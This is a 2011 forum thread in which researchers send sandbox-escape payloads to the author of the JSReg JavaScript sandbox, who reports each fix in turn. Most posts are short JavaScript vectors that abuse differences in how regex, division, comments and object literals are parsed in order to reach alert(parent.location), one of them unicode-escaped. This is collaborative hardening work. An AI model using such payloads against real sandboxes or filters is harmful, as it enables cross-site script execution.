1. As I understand it, the latest fix does not solve the problem of differentiation between the block's delimiter and the object's literal, but it converts a JSReg-break in a syntax error, which is not dangerous.

for(;{}/1/1;){} --> for (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax error
1/{}/alert(1)/1 --> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc

I hope you clean it in the future.

2. Non-FF browsers

var x
1
/'lo/,alert(parent.location)//'


I have not watched the whole the changes yet.

3. /[]/]/ <-- this works in IE8 Standards mode too (tested on IE9) and fixed in IE9 Standards mode (blogpost).

4. // I don't know how to thank...

I must confess that I don't testing of filters, sandboxes and millions of other protections, as it might seem. My activity - it is just small reward for your ideas that you share with the world for many years, but not the result of your refined trolling ~ a year ago. :)) Otherwise, I would come to the party faster, does not it?
Thank you!

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/14/2011 08:10PM by LeverOne.

LeverOne Wrote:
-------------------------------------------------------
> 1. As I understand it, the latest fix does not
> solve the problem of differentiation between the
> block's delimiter and the object's literal, but it
> converts a JSReg-break in a syntax error, which is
> not dangerous.
>
> for(;{}/1/1;){} --> for
> (;{}/(?:)/.$constructor$(/1/)1;){} // Syntax
> error
> 1/{}/alert(1)/1 -->
> 1/{}/(?:)/.$constructor$(/alert(1)/)1 // etc
>
> I hope you clean it in the future.

Yeah it's eliminates the difference between divide and regex by raising a syntax error because the regex is rewritten to force an error if it's used in a divide operation. Mike from the caja project pointed this idea out in caja and I thought it would be useful to apply here. Hopefully I can find a better fix

>
> 2. Non-FF browsers
>
> var x
> 1
> /'lo/,alert(parent.location)//'
>

Fixed this thanks

>
> I have not watched the whole the changes yet.
>
> 3. /[]/]/ <-- this works in IE8 Standards mode
> too (tested on IE9) and fixed in IE9 Standards
> mode (blogpost).

Ah thanks, I'll update the post. I thought it was 8 for some reason

> 4. // I don't know how to thank...
>
> I must confess that I don't testing of filters,
> sandboxes and millions of other protections, as it
> might seem. My activity - it is just small reward
> for your ideas that you share with the world for
> many years, but not the result of your refined
> trolling ~ a year ago. :)) Otherwise, I would come
> to the party faster, does not it?
> Thank you!


Hehe well thanks very much! It's very appreciated

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

var n
/'lo/,alert(parent.location)//'

----------------------
~Veritas~

I backed out of my var statement tracking since it clearly wasn't working and causing all sort of syntax errors. I now check for a new line followed by a "/" then automatically insert a semi-colon

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

while(0){x:1}/'lo/,alert(parent.location)//'

bug:

do{}while(0)

----------------------
~Veritas~

Fixed thanks!

I forgot to check for the last statement when the next curly begins. The no curly bug will be fixed in future if the sandbox fails to be broken. I'm tracking the opening and closing parens so it should in theory be pretty easy to fix

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

if(1){function x(){}/'lo/,alert(parent.location)}//'

----------------------
~Veritas~

thanks and fixed, the if statement wasn't being reset so the function was being detected as a function expression. The paren tracking is working well but it seems this vector you pointed out could be another weak area in my code, I may have to rewrite how jsreg detects functions, function expressions as well as block statements and object literals

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I knew the way of exploitation by Jonas come in handy...

for(;function(){}['constructor']('alert(parent.location)')();lo){}

This means that in some cases we can bypass /(?:)/.$constructor$(/blabla/)

var x
  /'lo/,alert(parent.location)//'

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/18/2011 09:33PM by LeverOne.

That is one sweet bypass, damn you :D

and fixed
I remove new lines and check if a eos should be added and when an array is detected I force a eos

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/19/2011 07:56AM by Gareth Heyes.

1/ /./;~{
lo:{}/'/,alert(parent.location)//'/ /./}

bugs for TODO:

x=[];

x:for(;;){break x;}

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/19/2011 11:44AM by LeverOne.

Fixed that VERY nice vector and fixed those bugs, in addition I've basically created a minifier and semi colon insertion since new lines can affect what an object is and a semi colon is very important for what happens next

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

GC only (tested on 14.0.825.0 dev-m Win)

/lo/\u002E\u003B\u0061\u006C\u0065\u0072\u0074\u0028\u0070\u0061\u0072\u0065\u006E\u0074\u005B\u0027\u006C\u006F\u0063\u0061\u0074\u0069\u006F\u006E\u0027\u005D\u0029\u002F\u002F

added later:

old issue:

if(0){}else{function x(){}/'lo/,alert(parent.location)}//'

try{function x(){}/'lo/,alert(parent.location)}catch(e){}//'

try{}catch(e){}finally{function x(){}/'lo/,alert(parent.location)}//'

bugs:

if(0){}
else{}

x=[
12];

----------------------
~Veritas~



Edited 3 time(s). Last edit at 07/20/2011 04:15PM by LeverOne.

That one is beautiful! Looks like a work of art :)
Fix soon when I get time

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Fixed em all apart from the if(0){}else{} bug I'll have to track if statements for that which I don't currently do, it's on my todo list though. I've no idea why I was auto decoding unicode, I simply removed it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

function x(){}function y(){}/'lo/,alert(parent.location)//'

// FF only

function(lo)/'/;alert(parent.location)//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/20/2011 09:18PM by LeverOne.

Thanks!
Fixed, checked for missing curly in function and changed function expression check to make sure function doesn't follow a function

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

function function(){}/'lo/,alert(parent.location)//'

1/
/./;~{
lo:{}/'/,alert(parent.location)//'}

bug:

alert([])

----------------------
~Veritas~



Edited 1 time(s). Last edit at 07/22/2011 12:13AM by LeverOne.

Fixed! These are great attacks thanks

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

bugs:

[/x/]

[[]]

function x(){}(1)

function x()
{}


Great progress in terms of security! For example, I don't know how I'm going to bypass next time.

----------------------
~Veritas~

Wow LeverOne, impressive stuff!

Here's a new kind of vector that I don't remember seeing before:

[]/0//alert(window[),('location'])

Translates into:

;[];/(?:)/.$constructor$(/0/)/$alert$($window$[J.P(),('location')])

The browser sees Array/0//comment, but JSReg sees Array;RegExp/alert(...)
In the comment we can put any syntax that will break the JSReg parser.

Another bug:
[0 for(x in 0)]

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

@lever_one

Fixed those rewriting errors thanks!

@jonas

Quote

Another bug:
[0 for(x in 0)]

This isn't a bug, I don't allow generators. I check for any statements that don't have a "{" then raise a syntax error.

Quote

[]/0//alert(window[),('location'])

Impressive vector, here the regex logic was incorrect and now it correctly parses the comment and divide.

Quote

You should try to go for a full parser and not rely on the parser of the browser, since JSReg only handles a subset of what the browser can handle. If you have a full JS parser, then you can reject programs that do not adhere to the subset you allow. Now you can only make a best effort interpretation of the code, meaning that any differences between the parsers may lead to vulnerabilities.

Yeah I would do if I thought the attacks worked at the design level like before but in any of the cases recently submitted recently it's been human error with the logic of the syntax detection.

Now it's much stronger than previously but if you really want me to do a full parser please break it into pieces at the design level :D ideally I should wrap all objects and force them into their correct type as well but I'm seeing what's possible with the current method before I write more code. I don't think you'll be able to break it soon ;)

Then the big plan after it's assumed safe is modifying it the way slackers see it for example reduce code, wrap objects and anything else then we have an amazing sandbox to use on any project that we like

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 07/22/2011 11:42AM by Gareth Heyes.

@Gareth

Fix for (1)\n/0// fails on Opera and IE in document mode <= than IE8

----------------------
~Veritas~

@LeverOne

Thanks! Damn all these browser differences.

Narrowed it down to this:-
alert(/^.+[^x]/.test("aaaaaaax"));

I was assuming that the negative char class wouldn't match, so now I do a match without a ^ and reverse the if statement instead. In other words fixed :) but this still doesn't explain why on some browsers it worked since their behaviour was the same.

UPDATE.....
So I've added missing curly support in statements now, JSReg will attempt to correct any missing curlys in functions and other statements

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 07/26/2011 08:02AM by Gareth Heyes.

@Gareth - About the generator stuff; I know you don't allow them, but in the version I was using at that time the translation was [0 for $r$($x$ in 0)]. Now it works as it should! ;)

There are still some problems with Arrays and operators, but nothing I've managed to exploit..

[]+0
[]-0
[]*0
~[]

Some other problems:

++/0/[0]

[]?[]:[]

0+ +0

if(0){}else;

if(0)
{}

This could become something: [][[]]++<x+/>0/
Lots of confusion in that one, RegEx or E4X?

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

~function(lo)/**/{}/'/,alert(parent.location)}()//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 07/26/2011 10:22PM by LeverOne.

@jonas

Thanks! Fixed most of those, generators aren't allowed since I have to insert curlys to fix for..in statements. The e4x one should be detected as I disable e4x and since the "<" has to occur without anything to the "left" it should be "impossible" to inject ;)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@lever_one

Ugh. Might just have to disable curlys :(

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

function()lo
function(){}/'/,alert(parent.location)//'

bugs:

function()alert(arguments)

(function()alert(1))()

----------------------
~Veritas~

Fixed all those bugs, now I allow no curlys but don't insert them. Generators should work too.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]